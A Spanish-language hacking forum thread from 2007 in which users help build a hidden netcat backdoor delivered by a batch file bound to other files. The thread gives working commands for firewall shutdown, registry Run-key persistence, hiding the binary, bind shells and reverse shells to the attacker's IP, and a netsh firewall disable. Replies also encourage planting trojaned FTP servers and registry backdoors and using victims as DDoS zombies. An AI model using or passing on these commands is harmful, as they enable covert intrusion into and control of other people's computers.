Título: Batch + NetCat (ayuda) Publicado por: .Undertaker. en 1 Octubre 2007, 20:31 pm Bueno aqui les pongo lo que hago con el nc..ya que no me funciona:
1.)Lo primero meto el nc.exe en "%systemroot%"(windows). 2.)Creo un .bat: Citar @echo off cls net stop SharedAccess rem :con esto detengo el firewall + antivirus no? reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F rem :agrego el nc.exe para que se inicie con windows ping -n 5 127.0.0.1 rem :spero un poco attrib +a +s +h "%systemroot%\nc.exe" rem :Escondo el nc.exe exit Los rems no los coloco en el .bat ;D ;D ...Lo que keria saber es como abro un puerto en batch...i si podria acer la conexion inversa en batch. 3.)Bindeo el bat mas el nc, cn mas cosas i les digo que se extraigan en "windows"(ejecutandose a su vez...i asi conectarme...) P.D.Diganme los fallos para poder solucionarlo. Título: Re: Batch + NetCat (ayuda) Publicado por: Ferсhu en 1 Octubre 2007, 22:48 pm Citar reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F El fallo es q no sabes usar el netcat. Busca en el foro. Título: Re: Batch + NetCat (ayuda) Publicado por: .Undertaker. en 2 Octubre 2007, 11:04 am Citar reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe" /F El fallo es q no sabes usar el netcat. Busca en el foro. Que le pasa a esa linea del code??? Título: Re: Batch + NetCat (ayuda) Publicado por: darkraider en 2 Octubre 2007, 11:48 am Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto.
Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2 Título: Re: Batch + NetCat (ayuda) Publicado por: .Undertaker. en 2 Octubre 2007, 13:17 pm Lo que esta mal es que no basta con ejecutar el nc a "secas" tenes que especificar parametros para que escuche y en que puerto. Aparte de esto mirate la sintaxis de netsh que te sirve para abrir puertos. Salu2 gracias....Pero aora mira Código: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "winexe" /t REG_SZ /d "%systemroot%\nc.exe -vv -l -p 6000" /F con eso abriria el puerto 6000 para que estuviera a la escucha?? i luego con un netstat -a...Pues averiguo su ip. i ya esta no?? Título: Re: Batch + NetCat (ayuda) Publicado por: darkraider en 2 Octubre 2007, 13:20 pm Si con eso haces que el netcat escuche en el 6000, pero el solito no va a abrir el puerto. Te dije que leas sobre netsh para abrir puertos por consola del firewall de Windows. Lee primero, intentalo y si y solo si te surge una duda al respecto, pregunta. De onda te lo digo, jode escribir algo que ya esta escrito. Salu2
Título: Re: Batch + NetCat (ayuda) Publicado por: Zykl0n-B en 31 Octubre 2007, 17:22 pm Hola a todos, no sé si llegue tarde a éste Post, pero igual.
Viejo, aquí te dejo los parámetros del comando NETSH para que juegues con el Firewall y toda la configuración de la Red. Uso: netsh [-a AliasFile] [-c Context] [-r RemoteMachine] [Command | -f ScriptFile] Los siguientes comandos est n disponibles: Comandos en este contexto: ? - Muestra una lista de comandos. add - Agrega una entrada de configuraci¢n a una lista de entradas. bridge - Cambia al contexto `netsh bridge'. delete - Elimina la entrada de una configuraci¢n de la lista de entradas. diag - Cambia al contexto `netsh diag'. dump - Muestra una secuencia de comandos de configuraci¢n. exec - Ejecuta un archivo de secuencia de comandos. firewall - Cambia al contexto `netsh firewall'. help - Muestra una lista de comandos. interface - Cambia al contexto `netsh interface'. ras - Cambia al contexto `netsh ras'. routing - Cambia al contexto `netsh routing'. set - Actualiza la configuraci¢n de la informaci¢n. show - Muestra informaci¢n. winsock - Cambia al contexto `netsh winsock'. Espero que te sirva, saludos Título: Re: Batch + NetCat (ayuda) Publicado por: WHK en 31 Octubre 2007, 19:10 pm Citar nc.exe -vv -l -p 6000 No te va a resultar ya que primeramente la persona no deberia ver nada asi que Debes quitarle el -vv además Debes agregarle -d (die console) ya que si cierra la ventana entonces se desconectará... también Debes especificar que utilizará la consola de comandos a ejecutar si es eso lo que quieres.Windows: nc.exe -d -e cmd.exe -L -p 6000 Linux: nc -l -d -p 6000 -e /bin/sh sudo nc -l -d -p 6000 -e /bin/sh Título: Re: Batch + NetCat (ayuda) Publicado por: Zykl0n-B en 2 Noviembre 2007, 15:39 pm Eh... ¿Die console? esa función es nueva en el Netcat...
Yo conocía era a DETACH ó "Separado" de la consola.. Jaja.. Y sí, todo depende de lo que quieras hacer... si quieres chatear con tu víctima, sí te serviría esa linea de comandos: "nc.exe -l -p 6000" Con eso tú desde tu casa te conectas y le dices "Hola, soy yo". Si quieres una Shell remota de la víctima, tienes varias (Bastantes) formas de hacerlo.. 1.-en caso de que tu víctima no tenga el Firewall activado para que no te rebote la conexión.. "nc -d -e cmd.exe -l -p 6000" 2.- En caso de que tenga el Firewall Activado, pues, hagamos que sea tu victima quién te hackee a tí xD, ésto es posible porque Netcat ejecuta programas con la opción "Execute" (-e) por conexiones entrantes ó salientes, da igual: Primero deja en tu casa un Netcat a la escucha en el puerto al que tu víctima se vaya a conectar: "nc -v -v -l -p 6000" Ahora ejecuta ésto en la Pc victima: "nc -d -e cmd.exe TU_IP_Ó_DNS 6000" ¡Voilá!, tienes una shell remota, pero si quieres algo más "Educativo", sáltate el Firewall de tu víctima de la siguiente manera: Deja en tu casa 2 shells abiertas ejecutando a Netcat en modo escucha en los puertos 80 (http) y 25 (smtp): C:\>nc -v -v -l -p 80 C:\>nv -v -v -l -p 25 Ahora ve a dónde tu víctima y ejecuta ésto: "nc -d TU_IP_Ó_DNS 80 | cmd | nc -d TU_IP_Ó_DNS 25" Listo, ahora ¿Qué pasó? Pues, deberás escribir los comandos en la Shell que dejaste escuchando en el puerto 80.. ¿Pero no te responde nada? jaja, las respuestas a los comandos que escribas por esa shell saldrán en la shell que dejaste escuchando en el puerto 25.. ¡Voilá! Otra shell remota NOTA: Es obvio que tienes que desactivar tu firewall para que la víctima se conecte contigo. Y una vez que tengas la shell de la víctima, ¿Por qué no desactivar el de él? C:\Documents and settings\Victima>Netsh FIREWALL set opmode mode = DISABLE Listo, Firewall desactivado :P Para activarlo de nuevo sólo escribe lo mismo y suplanta DISABLE por ENABLE Bájale por TFTP un servidor Ftp "Troyanizado", ejecutalo ocultamente (Serv-U permite hacer eso (-h)) y tendrás vista de todos sus archivos de manera "Gráfica" y no por consola. Agrégale al Registro de Windows uno ó varios Backdoors, tienes infinidad de formas de hacerlo. Aprovecha a tirar tus ataques por esa shell, utilízala como Zombie para ataques D.D.O.S., no sé, sólo ponte creativo.. |